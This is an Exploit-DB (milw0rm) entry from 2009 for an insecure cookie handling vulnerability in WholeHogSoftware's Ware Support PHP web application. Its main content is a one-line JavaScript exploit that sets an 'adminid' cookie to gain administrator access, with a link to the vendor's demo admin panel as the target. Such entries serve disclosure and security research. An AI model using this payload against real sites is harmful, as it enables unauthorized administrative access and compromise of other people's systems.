WholeHogSoftware Ware Support - Insecure Cookie Handling

EDB-ID:

7951

Author:

Stack

Type:

webapps

Platform:

PHP

Published:

2009-02-03

###########################################################################
[+] WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability
[+] Script   :Ware Support
[+] Site     :http://wholehogsoftware.com
[+] Detay    :http://wholehogsoftware.com/index.php/page/ware_support
[+] Discovered By Mountassif Moad   
              
[+] www.v4-team.com            
       
[+] Greetz : All my Freind
###########################################################################
Exploit:
javascript:document.cookie = "adminid=8; path=/";
DeMo :
http://www.wholehogsoftware.com/demo/support/admin/

# milw0rm.com [2009-02-03]